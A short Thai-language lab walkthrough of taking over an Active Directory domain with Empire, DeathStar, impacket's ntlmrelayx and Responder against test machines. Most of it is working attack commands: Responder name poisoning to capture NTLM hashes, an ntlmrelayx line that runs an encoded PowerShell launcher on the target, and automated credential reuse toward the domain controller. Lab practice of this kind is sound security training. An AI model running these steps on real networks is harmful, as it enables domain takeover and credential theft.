lab นี้เป็นการทดสอบใช้งาน Empire + DeathStar เพื่อยึด Active Directory ครับ โดยใน lab นี้ประกอบไปด้วย
- Kali 2017.2 (192.168.100.101)
- Windows 7 (Join AD) (192.168.100.100)
- Windows Server 2012 R2 AD (192.168.100.1)
Kali
1. ติดตั้ง Empire
1 2 3 4 5 |
git clone https://github.com/EmpireProject/Empire ./setup/install.sh ### SETUP RestAPI sudo python empire --rest --username empire --password p@ssw0rd |
2. ติดตั้ง Deathstar
1 2 3 |
git clone https://github.com/byt3bl33d3r/DeathStar apt-get install python3-pip pip3 install -r requirements.txt |
3. Deathstart connect ไปยัง Empire
1 |
sudo ./DeathStar.py --listener-ip 192.168.100.101 -u empire --password p@ssw0rd --debug |
4. กลับไปยัง Empire สร้าง Listener และ powershell ขึ้นมา
1 2 |
listeners launcher powershell DeathStar |
5. ติดตั้ง ntlmrelayx.py
NTLMRelayx.py เป็น python script สำหรับการทำ relay NTLMv1/v2
1 2 3 4 5 |
git clone https://github.com/CoreSecurity/impacket.git pip install ldap3 dnspython pip install ldapdomaindump cd impacket python setup.py install |
1 |
sudo ntlmrelayx.py -t 192.168.100.100 -c 'powershell -noP -sta -w 1 -enc [powershell code]’ |
สิ่งที่เกิดขึ้นคือเราจะเปิด smb ค้างไว้ที่เครื่องของ Kali เมื่อมีการเข้าใช้งาน smb service ดังกล่าว ตัว Client (Windows 7) ก็จะส่ง NTLM มาให้ จากนั้นเราก็ส่งต่อไปยัง Windows Server 2012 AD พร้อมกับกำหนด powershell code ที่จะรันที่ปลายทาง ซึ่งถูกเราสร้างไว้ในขั้นตอนที่ 4 นั่นเอง
6. Run Responder โดยปิดการทำงาน SMB และ HTTP โดยเข้าไปแก้ไข Responder.conf
จากนั้นรันเป็น
1 |
python Responder.py -I eth0 -r -d –v |
- -r คือการ response netbios wredir suffix queries.
- -d คือการ response netbios domain suffix queries.
- -v คือการ enable verbose mode
ทีนี้หากมีการ resolve name ใดๆผิดขึ้นมา มันจะมีการสร้าง NetBIOS ใน subnet เดียวกันขึ้นมา ซึ่งแน่นอนว่า server เราก็จะตอบกลับไปเพื่อหลอกให้ user เข้ามาใน File Sharing Server และได้ NTLM มานั่นเอง
เมื่อ Empire ได้รับ agent แล้ว สิ่งที่เกิดขึ้นต่อคือ Deathstar ก็จะช่วยต่อในการเข้าไปพยายามหา domain controller แล้วนำ credential ที่เรามีไปเข้าเครื่องอื่นต่อทั้งหมดนั่นเอง
Source:: hausec